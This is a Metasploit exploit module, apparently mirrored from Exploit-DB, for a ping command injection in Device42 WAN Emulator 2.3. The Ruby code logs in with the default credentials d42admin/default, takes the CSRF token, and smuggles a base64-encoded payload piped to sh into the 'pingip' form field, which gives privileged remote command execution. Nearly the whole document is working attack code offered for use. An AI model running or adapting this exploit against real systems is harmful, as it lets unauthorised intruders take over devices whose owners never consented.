Device42 WAN Emulator 2.3 – Ping Command Injection (Metasploit)

  • 作者: Brandon Perry
    日期: 2014-11-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35384/
  • ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'WAN Emulator v2.3 Command Execution',
    'Description'=> %q{
    },
    'License'=> MSF_LICENSE,
    'Privileged' => true,
    'Platform' => 'unix',
    'Arch' => ARCH_CMD,
    'Author' =>
    [
    'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
    ],
    'References' =>
    [
    ],
    'Payload'=>
    {
    'Space' => 1024,
    'BadChars'=> "",
    'DisableNops' => true,
    #'Compat'=>
    #{
    #'PayloadType' => 'cmd',
    #'RequiredCmd' => 'generic netcat netcat-e',
    #}
    },
    'DefaultOptions' =>
    {
    'ExitFunction' => 'none'
    },
    'Targets'=>
    [
    ['Automatic Targeting', { 'auto' => true }]
    ],
    'DefaultTarget'=> 0,
    'DisclosureDate' => 'Aug 12 2012'
    ))
    end
    
    def exploit
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
    })
    
    cookie = res.headers['Set-Cookie']
    
    csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
    
    post = {
    'csrfmiddlewaretoken' => csrf,
    'username' => 'd42admin',
    'password' => 'default',
    'next' => '/'
    }
    
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
    'vars_post' => post,
    'method' => 'POST',
    'cookie' => cookie
    })
    
    unless res.code == 302
    fail_with("auth failed")
    end
    
    cookie = res.headers['Set-Cookie']
    
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'ping/'),
    'cookie' => cookie
    })
    
    cookie = res.headers['Set-Cookie']
    csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
    
    post = {
    'csrfmiddlewaretoken' => csrf,
    'pingip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
    'ping' => ''
    }
    
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'ping/'),
    'method' => "POST",
    'vars_post' => post,
    'cookie' => cookie
    })
    end
    end